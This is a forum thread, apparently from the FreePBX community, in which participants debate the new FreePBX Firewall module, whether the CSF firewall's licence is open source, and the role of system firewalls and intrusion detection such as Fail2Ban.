It would stop the drive by hackers dead in their tracks. Securing against a person specifically trying to hack you such as an employee or a customer is a different requirement and a risk most accept for the convenience of remotes access.

Hah. Funny that this post was bubbled up to the top of my thread list, what with the new Firewall module!

Consider your challenge accepted, run with, and complete, @dicko!

As we discussed on IRC, CSF isn’t open source, (in fact, their licence says you can’t even look at the source!) so we couldn’t use that. But I think everyone’s pretty happy with the (100% real AGPL v3+ FOSS) Firewall module.

Well, although I can’t agree with your interpretation of their license (and I have talked to them), I will give you that you perhaps obliquely took up the challenge, so that is excellent.

Completed perhaps, only when running, as you promised, on any FreePBX unconstrained by commercially licensed pre-requirements. I am an old curmudgeon; if you add ipsets and comprehensive forwarding rules I will sample it again :wink:

Nice work though . .

Here’s the licence I’m looking at: http://download.configserver.com/csf/license.txt That licence contains this section:

3.1	You shall not:
	3.1.1	modify, adapt, merge, translate, decompile, 
	disassemble, or reverse engineer the Product, except as 
	permitted by law; or

If that’s not what they intend, they should fix their licence, because it’s pretty explicit there that you’re not allowed to look at the code, in any way, shape, or form. There’s no exclusion anywhere else that allows you to look at the code, even for evaluation. So, yeah, this is in no way shape or form open source. Really, truly. If they WANT it to be open source, they need to fix that licence. Until then, they can’t claim it’s OSS, or even OSS friendly (as they could at least have an exclusion for use with LGPL code).

Maybe, but there’s no need for it at the moment. Feature request? (But, WHY?)

Never. This is not a network firewall. This is a system firewall. There are plenty of firewalls that handle (easy) network stuff. This is a system firewall, which is hard and complex, and people mess up.

Nowhere does it say you can not read/look at it :wink: It does say you can’t “modify, adapt, merge, translate, decompile, disassemble, or reverse engineer” it, or did I miss something in 3.1? In fact you NEED to READ it to understand how it works and how to get the best out of it (ipsets for example). This by my interpretation is encouraged, not forbidden.

Because there are connected bot-nets out there, there will always be developing dynamic attack vectors; even the most basic FreePBX installation exposes network services that are vulnerable, even if by drive-bys. Adding dynamic IDS rules like F2B and CSF do by watching connections makes sense to me; generic flood rules will often break imap et al. So FAX2Email/Email2FAX is an example. Specific Asterisk type directed attacks like VTiger/ARI or even I might suggest FreePBX in the past should be scripted.

Pretty well any Linux has iptables as its kernel-based filter, even if wrapped in systemd/firewalld. As “The Distro” includes Fail2Ban, perhaps the recidive jail at least should be dynamically added to your firewall, or are you suggesting that IDS is not needed any more?

I have many NUCs and PIs under kitchen sinks somewhere that effectively provide both VOIP and a firewall between COX/COMCAST/ATT and your “connected home”; WIFI is cheaper than rewiring a complete house with CAT-5.

At least the three of ‘decompile’, ‘disassemble’ and ‘reverse engineer’ cover ‘looking at the source’.

So, yeah, it does say that. Those three things. ‘Reverse Engineer’ covers that even more, as you can’t even attempt to understand what it does. It’s not an open source licence. I don’t know why you’re arguing this? If it was an Open Source licence, it would be open source. Which it’s not.

To quote Licenses – Open Source Initiative

Open source licenses are licenses that comply with the Open Source Definition — in brief, they allow software to be freely used, modified, and shared.

It’s not open source. It’s closed source. And because it’s written in Perl, the source is available, so they explicitly deny you the privilege to look at it. Just to make sure that you’re aware that it’s not open source.

At no point in that licence I linked to above is there any wording that encourages or even HINTS that you have permission to look at the source. Nowhere. I read it twice, in full, in case I missed something. It’s not there. So, let’s just move on. CSF is free, but it’s not open source, by any stretch of the imagination. (Exactly like the FreePBX modules Sysadmin or Extension routes.)

Kinda don’t know what you’re getting at there, sorry. If you’re saying you want FreePBX Firewall to be a network firewall, then no, that’s never going to happen, as there’s plenty of other things much better at doing that – for example, the modem that connects you to the internet :sunglasses:

Never mind Rob, I am happy with my solution, and I think it is better than yours and a little more mature, but that’s OK. There are many ways to connect to the internet; in 2015 pretty well none are modems (modulators/demodulators), many call them routers nowadays. I told you I was a curmudgeon, right?

Your fearless leader says yours is “perfect”, do you agree? :slight_smile: